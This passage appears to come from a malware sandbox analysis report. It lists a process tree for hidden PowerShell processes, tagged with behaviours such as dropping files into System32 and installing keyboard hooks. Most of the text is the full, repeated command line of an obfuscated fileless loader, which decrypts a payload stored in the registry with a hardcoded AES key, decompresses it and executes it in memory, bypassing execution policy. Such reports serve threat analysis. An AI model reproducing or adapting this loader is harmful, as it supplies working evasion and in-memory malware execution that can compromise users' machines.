'')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        21⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:8804
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:8496
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:8664
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        22⤵
        
        PID:8736
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(8804).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = 